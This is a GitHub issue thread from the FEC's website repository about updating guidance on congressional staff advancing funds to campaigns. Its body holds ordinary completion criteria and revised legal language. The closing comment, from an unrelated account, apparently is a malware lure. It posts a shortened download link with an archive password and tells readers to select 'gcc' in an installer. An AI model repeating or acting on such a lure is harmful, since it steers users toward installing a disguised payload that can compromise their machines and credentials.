### ISSUE TITLE
Update language on the H4CC Page: Advances by Individuals 

### ISSUE THREAD

**Issue by kathycarothers** [fecgov/fec-cms#6453]
### Summary

**What we're after:**
Ensuring our web pages have the most accurate information on them to help the regulated community. 

### Completion criteria

- [x] The following page needs a section of language updated: https://www.fec.gov/help-candidates-and-committees/handling-loans-debts-and-advances/advances-individuals/ 
- [x] Update the section entitled "Congressional and presidential staff" with the language provided by Congressional Affairs. See Email from Greg 
- [x] Once updated have Congressional Affairs review the updates a
- [x] Publish changes and alert Congressional affairs 

Changes:

Congressional staff
House Rules and related guidance issued by the Committee on Ethics, as well as the criminal statute at 18 U.S.C.  §603,prohibit official staff from making a contribution to the campaign of their employing Member of Congress. As such, it is important for those individuals to avoid advancing any funds to the campaign (for example, buying stamps for a campaign mailing). 
For more information, contact the [Senate Select Committee on Ethics](http://www.ethics.senate.gov/public) or the [House Committee on Ethics](https://ethics.house.gov/). For information about political activity by federal employees, contact the [U.S. Office of Special Counsel](https://osc.gov/Pages/contact.aspx).

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
